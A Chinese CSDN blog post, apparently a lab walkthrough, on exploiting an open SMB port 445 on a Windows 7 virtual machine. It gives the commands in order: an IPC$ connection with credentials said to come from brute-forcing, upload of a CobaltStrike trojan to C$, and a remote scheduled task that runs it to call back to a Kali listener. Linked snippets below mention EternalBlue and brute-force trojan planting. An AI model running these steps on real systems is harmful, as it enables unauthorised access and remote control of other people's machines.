445端口的简单利用

最新推荐文章于 2023-08-02 19:26:47 发布
最新推荐文章于 2023-08-02 19:26:47 发布
阅读量1.5w 收藏 25
点赞数 9
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FNjoker/article/details/118981058
版权

445端口的简单利用

前期准备

1.windows10主机一台

2.kali虚拟机一台

3.win7虚拟机一台

4.CobaltStrike4.0

5.将win7虚拟机的445端口开放

简单思路说明

本次实验的目的就是测试一下在靶机开了445端口的情况下如何利用。

实验的思路是在测试到对方主机445端口开放的情况下,利用ipc$建立连接,之后将后门程序上传上去。

实验开始

在win10上输入命令:telnet 192.168.137.129 445 测试一下靶机的445端口的开放情况。

在通的情况下输入如下命令:

net use \\192.168.137.129\ipc$ 密码 /user:账号

此时是不能够和对方建立起ipc空链接的,因为不知道对方的账号和密码。不过这一步可以通过暴力破解来完成(工具可以利用NTscan)。

假设此时已经通过暴力破解获取了对方的密码和账号,之后可以重新输入如上命令

请添加图片描述

此时已经得到提示命令执行成功。

请添加图片描述

使用dir命令简单测试下,发现已经能查看到对方主机的c盘文件。

接下来使用CobaltStrike4.0来生成木马,具体CobaltStrike4.0这个工具的详细使用说明这里就不叙述了,网上一查一大堆。

请添加图片描述
请添加图片描述
请添加图片描述

创建好木马之后,就可以利用刚才建立好的ipc空链接,将木马传到靶机上了。

copy E:\1.exe \\192.168.137.129\c$

请添加图片描述

此时靶机上c盘下就多了1.exe文件。

之后想办法远程执行这个1.exe木马,触发回弹到监听器,做到控制靶机。

远程执行的的方法依旧是利用刚才建立好的ipc空链接,给靶机做一个定时任务。

请添加图片描述

schtasks /create /tn "connect" /s "192.168.137.129" /tr "c:\1.exe" /sc daily /st 23:57:00 /u "Administrator" /p "abc123"

这里面create是创建任务,tns是任务名,s是远程ip,,tr是可执行文件,脚本之类的任务,sc是任务类型,daily代表每天一次,st是执行时间,u代表用户名,p代表密码,用户名和密码是刚才暴力破解出来的。

请添加图片描述

任务执行成功后回到kali可以看到靶机已经上线了。

涉及到的知识点

1.CobaltStrike4.0的使用

2.ipc$是什么

3.schetasks使用命令参数,以及和at命令的区别。

4.暴力破解是如何做到的

FNjoker
关注
  • 9
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
关闭135,139,445端口TCP 137,138端口UPD.bat
05-28
都知道135端口,139端口以及445端口.这三个端口容易被黑客或者病毒利用.所以我们今天就来教下大家如何关闭它. 太难的方法就不教给大家了.什么实用策略组之类的.新手感觉很麻烦.所以下面给大家来简单的教程 打开 关闭135,139,445端口TCP 137,138端口UPD.bat,然后运行就可以了
漏洞利用三:445端口漏洞利用
ZY95001的博客
09-04 1万+
445端口用来访问共享文件夹,445端口之所以危险,是因为厂商默认开放。 靶机:win7系统 IP:10.0.0.199 提前关闭靶机防火墙 一、MS17-010 永恒之蓝 MS微软,17年,10号漏洞。即新闻上报道的比特币勒索病毒。 1.进入MSF控制台:msfconsole 2.找到要利用的漏洞输入编号(search命令):search ms17-010 3.查看组件列表,选择要利用的攻击项(use命令):use 0 4.以为此处提示需...
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
Tomcat 多端口 多应用
09-06
当你使用Tomcat作为Web Server的时候,是不是会想过这样的一个问题:如何利用Tomcat建立两个Web Server,同时侦听来自不同端口的请求呢?要实现这一点是很简单的。以下假设Tomcat安装在D:/Tomcat5.0目录下。
利用Node.js检测端口是否被占用的方法
01-20
前言 在学习tcp/ip的时候,经常遇到一些关于跟端口有关的东西,在写网络上的一些东西,有时用的一些端口被提示:端口已被占用,啊啊啊,挺郁闷的,然后就想着将它搞明白,下面话不多说了,来一起看看详细的介绍吧。 Nodejs检测端口是否被占用 开启本地服务时,有这么一种情况:当前端口已经被另一个项目使用了,导致服务开启失败。 那么接下来,我们通过简简单单的十行代码来检测端口是否已经被占用。 思路 想要知道端口是否被占用,我们可以开启一个新的服务并监听该端口,若开启成功则说明端口未被占用,反之该端口已经被其他程序使用了。 基本思路有了,下面我们开始编写代码。 基础代码 portIsOccu
mac电脑访问windows共享文件夹连接不上(设置445端口
CSDN_Lrcx的博客
08-02 4944
解决mac访问windows共享文件夹连接不上的问题,主要是在windows防火墙的入站规则中添加445端口
445端口的用处和禁用
04-22 1674
它在Windows NT中运行于NetBT(NetBIOS over TCP/IP,端口137、139和138/UDP)之上。微软在Windows 2000/XP中启用了直接通过TCP/IP运行SMB的能力,而不需要额外的NetBT层,TCP端口445被用于此。445端口被较新版本的SMB(Windows 2000之后)利用在TCP堆栈之上,允许SMB在互联网上互动。恶意软件也可以渗透进来,因此通常建议停用它。然而,它也会阻止你进行文件和打印机共享,因此你可能需要在内部防火墙中允许该端口使用此类共享服务。
SMB服务445端口利用汇总
m0_57221101的博客
03-26 7696
一直以来在渗透的时候一旦遇到SMB就会开始手忙脚乱到处找利用方法,今天总算醒悟,写一篇自己的总结,慢慢更新,遇到了什么新鲜的思路都会往里面添加。 特征 使用nmap勘探会发现开放SMB的机器,会开放两个端口通常为139+445的组合 在不使用-sCV探测时 这两个端口运行的服务一般会显示为 139 445 当具体探测之后两个端口则都会显示出一样的信息,有关具体的SMB版本 利用 壹 最简单的方法当然是利用已有漏洞,当然这种情况也是比较少遇到 当然我这种方法是
网络安全:通过445端口暴力破解植入木马。
srhqwe的博客
04-30 2561
本地的cmd上并不能让程序在对方电脑上执行,如果使用\\10.1.1.2\C$\system.exe。同时at是可以定时,因为可能地区上的差异,可以用net time \\10.1.1.2看对方主机的时间。$之前代表的是共享什么文件夹,ipc是通用的,也可以是C$共享C盘,D$共享D盘。需要注意,这里时间最后写对方主机时间后3分钟开外,否则有可能让系统认为是明天。在cmd输入net use \\x.x.x.x\ipc$程序放入对方磁盘后,就需要在对方电脑上执行了。如上图可以让对方主机执行这条命令。
445端口不通经验总结
tech
04-12 3万+
445端口不通经验总结日期:2018年4月11日 445端口是使用共享文件夹的端口。近期遇到一个问题,客户必须使用共享文件夹服务,所以必须把445端口打开。这两天很多精力都耗费在这件事情上,现在总结经验如下。 445端口若不通,首先在本地连接属性中将“Microsoft网络客户端”和“Microsoft网络的文件和打印机共享”两项勾选上。  然后运行gpedit.msc,在“本地组策略编辑器”中选...
利用Winsock写的端口扫描程序,有简单注释
01-09
Private Sub Command1_Click() List1.Clear If Text2.Text = "" Or Text3.Text = "" Then MsgBox "没有端口扫什么扫啊!" & vbCrLf & "输入从1到65535的端口号。", 0 + 48, "端口号不能为空!" ElseIf Text2.Text > "65535" Or Text3.Text > "65535" Then MsgBox "没有这么大的端口号的!" & vbCrLf & "正确的端口号从1到65535。", 0 + 48, "端口号错了!" End If Winsock1.Close Start = True Call SCanningPorts '调用自定义过程 List1.AddItem "端口" & Text2.Text & "-" & Text4.Text & "已扫描完成!" '扫描结束了 List1.Text = List1.List(List1.NewIndex) End Sub
Linux利用nc命令监控服务器端口的方法
11-12
最近碰到一个项目,前端用apache htttpd进行发布(80端口),通过双机负载均衡转发到后端的两个tomcat进行处理(8081和8082端口),现在需要随时监控这三个端口的情况,一旦down掉需要能够立即告警处理。批量的系统监控比较好的是用nagios软件来实现,这样小项目专门装一个nagios软件,有点繁琐了。在网上查了一些资料,总结实验了一下,可以用简单的nc命令来实现。
利用139/445端口思路——永恒之蓝
jammny
05-30 8746
前言 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 复现环境: 攻击机:Linux kali2020.2(IP:192.168.23.130) 靶机:Windows 7 X64 (IP:192.168.232.136) 1.目标扫描 这里跳过发现主机过程,用nma..
445/139端口的作用与危害
蝴蝶兰的专栏
01-23 6511
445端口(Common Internet File System(CIFS)(公共Internet文件系统))是一个毁誉参半的端口,有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机,但也正是因为有了它,黑客们才有了可乘之机,他们能通过该端口偷偷共享你的硬盘,甚至会在悄无声息中将你的硬盘格式化掉!  关闭445端口的方法有很多,但是我比较推荐以下这种方法:  
445端口爆破试验 net use IPC$
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
07-14 1880
原理 445 是文件共享端口,就是说,pc1文件夹共享后,pc2通过账户密码即可更改、读取、完全控制该文件夹。 但是有个漏洞,就是如果net user 路径写的不是文件夹,而是ipc$ 或者 c$,意味着pc2权限就会很大。 命令 命令1 net use f: \10.1.1.11\test test666.com /user:administrator 命令2 net use \10.1.1.11\ipc$ test666.com /user:administrator ipc$ 是 空连接的意.
文件共享服务器 & 利用445端口
coderge's CSDN Blog.
08-02 6136
一、共享服务器概述 通过网络提供文件共享服务,提供文件下载和上传服务(类似于FTP服务器) 这个文件共享协议用的是CIFS协议(微软系统全系都带这个服务) 二、创建共享 方法:文件夹右键属性--共享--开启共享--设置共享名--设置共享权限 共享名不一定需要和文件夹名相同,共享名就是外部访问时候看到的文件夹名字。 注: 1)在本地登录时,只受NTFS权限的影响 2)在远程登录时,将受 共享 及 NTFS权限 的共同影响,且取交集! (严格的要求) 3)所以建议设置共享权限为everyo
445端口
java_java_cl的博客
07-30 8393
445端口是一种TCP端口,该端口在windows 2000 Server或Windows Server 2003系统中发挥的作用与139端口是完全相同的。具体地说,它可以提供局域网中文件或打印机共享服务。不过该端口是基于CIFS协议(通用因特网文件系统协议)工作的,而139端口是基于SMB协议(服务器协议族)对外提供共享服务。同样地,攻击者与445端口建立请求连接,也能获得指定局域网内的各种共享信息。 445端口的作用是实现一些共享文件夹以及一些共享打印机的访问工作,只要在局域网络的范围之内就能进行轻松
kali (永恒之蓝MS17_010)漏洞复现
菜菜的博客
05-25 1756
8步完成get shell,需要的机子:渗透机(Linux(kali)一台),靶机(server 2008一台),简单的配置,就可以开始攻击了
施耐德PLC例程源码twidopid控制实列
最新发布
04-22
施耐德PLC例程源码twido pid 控制实列提取方式是百度网盘分享地址
python利用snmp读取交换机端口流量
05-12
Python是一种流行的编程语言,它能够轻松地操作SNMP(简单网路管理协议)工具箱。利用Python和SNMP,我们可以读取交换机端口的流量信息。 SNMP可以提供交换机的相关信息,例如端口状态、使用情况、卡槽数量等等。通过Python的脚本编写,我们可以解析SNMP返回的数据,并按照需要展示相关信息。 使用Python编写的程序,可以定义SNMP操作的OID(对象标识符),以读取交换机上指定端口的流量信息。程序中需要输入设备的IP地址、设备的SNMP Community字符串和OID标识符等信息。 Python的SNMP工具箱中,最基本的是Pysnmp。它是一个SNMP协议的软件库,可以轻松实现SNMP的访问和操作。除了Pysnmp之外,还有其他SNMP工具箱,像Net-SNMP等。这些工具箱可以提供给Python操作系统、硬件、设备等底层信息。 Python的SNMP工具箱可以实现交换机的监控、维护和故障排除。通过读取端口流量信息,可以了解交换机的使用情况,并针对性地调整网络带宽和端口配置。 总之,Python结合SNMP工具箱可以很方便地读取交换机端口的流量信息,实现监控和管理。利用Python和SNMP,我们可以更好地了解网络设备和网络使用情况,提高网络性能和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值